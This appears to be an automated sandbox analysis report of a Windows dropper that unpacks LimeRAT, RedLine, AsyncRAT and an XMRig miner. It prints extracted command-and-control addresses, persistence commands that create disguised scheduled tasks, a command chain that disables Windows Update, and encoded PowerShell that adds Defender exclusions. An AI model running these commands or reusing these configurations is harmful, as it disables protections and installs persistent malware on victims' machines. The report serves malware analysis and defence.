Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
24-08-2022 20:26
General
-
Target
a18193c95d0c31ab132d9bc2da884d7c.exe
-
Size
22.0MB
-
MD5
a18193c95d0c31ab132d9bc2da884d7c
-
SHA1
063e58b4b3b920e68006d4d28625df894e20750a
-
SHA256
6d6ebf1870d5d9c6bfebdc9fee3a3f381f86b32770f34df41364f905a489486c
-
SHA512
1c5119a13ddbbe2293759e5cd66de8747abba98d46aa9883c1ccadb489a2cf54be58766aa157fd383a6f631c9265d7b873c068fd992c6dc592ab32a6afd10547
-
SSDEEP
393216:TJWrtpiMPeMNKxIyMMUGJQmNVmIRKGl5X1+moeWJIYR22uYZm:kpWMtMUJ+KG3XsmOZFpm
Malware Config
Extracted
limerat
-
aes_key
123
-
antivm
true
-
c2_url
https://pastebin.com/raw/mchxnAbT
-
delay
80
-
download_payload
false
-
install
true
-
install_name
WindosCert.exe
-
main_folder
AppData
-
pin_spread
true
-
sub_folder
\
-
usb_spread
true
Extracted
redline
193.106.191.16:28958
193.106.191.106:26883
62.204.41.141:24758
193.124.22.40:19788
-
auth_value
057b2256d154683c7559f6a91f04717e
Extracted
redline
@Miroskati
litrazalilibe.xyz:81
-
auth_value
384ebbf9bd4d7e80bf3269909b298f87
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
-
LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
-
Modifies security service 2 TTPs 5 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Async RAT payload 5 IoCs
-
Enumerates VirtualBox registry keys 2 TTPs 10 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 2 IoCs
-
XMRig Miner payload 5 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 24 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
VMProtect packed file 17 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
-
Modifies file permissions 1 TTPs 4 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
-
Suspicious use of SetThreadContext 6 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 1 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\a18193c95d0c31ab132d9bc2da884d7c.exe"C:\Users\Admin\AppData\Local\Temp\a18193c95d0c31ab132d9bc2da884d7c.exe"1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAdABkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAZgB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAdQBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdABrACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "UpdateChromeDay" /tr '"C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe"' & exit3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "UpdateChromeDay" /tr '"C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe"'4⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDB5C.tmp.bat""3⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
-
C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe"C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe"4⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 578276 -s 2044⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"2⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VirtualBox Guest Additions in registry
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\GeForce\Lib\COM Surrogate.exe"C:\ProgramData\GeForce\Lib\COM Surrogate.exe"3⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VirtualBox Guest Additions in registry
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SYSTEM32\cmd.execmd /c schtasks /create /sc MINUTE /mo 1 /tn "VLC\MediaDriver" /tr "C:\ProgramData\GeForce\Lib\COM Surrogate.exe" /f4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /sc MINUTE /mo 1 /tn "VLC\MediaDriver" /tr "C:\ProgramData\GeForce\Lib\COM Surrogate.exe" /f5⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c schtasks /create /sc MINUTE /mo 1 /tn "Mozilla\Firefox Default Browser Agent AB3751B1JF7410A0" /tr "C:\ProgramData\GeForce\Lib\COM Surrogate.exe" /f4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /sc MINUTE /mo 1 /tn "Mozilla\Firefox Default Browser Agent AB3751B1JF7410A0" /tr "C:\ProgramData\GeForce\Lib\COM Surrogate.exe" /f5⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c schtasks /create /sc MINUTE /mo 10 /tn "VLC\MediaDriverDriver" /tr "C:\ProgramData\GeForce\Lib\COM Surrogate.exe" /f4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /sc MINUTE /mo 10 /tn "VLC\MediaDriverDriver" /tr "C:\ProgramData\GeForce\Lib\COM Surrogate.exe" /f5⤵
- Creates scheduled task(s)
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\3.exe >> NUL3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\AppData\Roaming\WindosCert.exe'"3⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Roaming\WindosCert.exe"C:\Users\Admin\AppData\Roaming\WindosCert.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\7.exe"C:\Users\Admin\AppData\Local\Temp\7.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\9.exe"C:\Users\Admin\AppData\Local\Temp\9.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 578284 -s 7924⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\v0.7.exe"C:\Users\Admin\AppData\Local\Temp\v0.7.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe"5⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe"5⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SLAYER Leecher v0.7 .exe"C:\Users\Admin\AppData\Local\Temp\SLAYER Leecher v0.7 .exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 245488 -s 9884⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\8.exe"C:\Users\Admin\AppData\Local\Temp\8.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBIAEUAQQBZAGcAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBIAEEARwA4AEEAYgB3AEIAbgBBAEcAdwBBAFoAUQBCAGMAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEYAdwBBAGQAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQB0AEEARgBZAEEAWgBRAEIAeQBBAEcASQBBAEkAQQBCAFMAQQBIAFUAQQBiAGcAQgBCAEEASABNAEEASQBBAEEAOABBAEMATQBBAGQAZwBCAHMAQQBHAFEAQQBjAFEAQQBqAEEARAA0AEEAIgAnACkAIAA8ACMAdQBzACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAcQBvAHMAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBpAGkAbwBhACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAcQB1ACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwANgAuAGUAeABlACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGYAdAB6AGIAIwA+ADsAIABTAHQAYQByAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAPAAjAHMAZgAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnADsA"3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAYQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAGsAcwBsACMAPgA="1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 245488 -ip 2454881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 578284 -ip 5782841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 578276 -ip 5782761⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHEAYgAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAdgBsAGQAcQAjAD4A"1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAYQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAGsAcwBsACMAPgA="3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
-
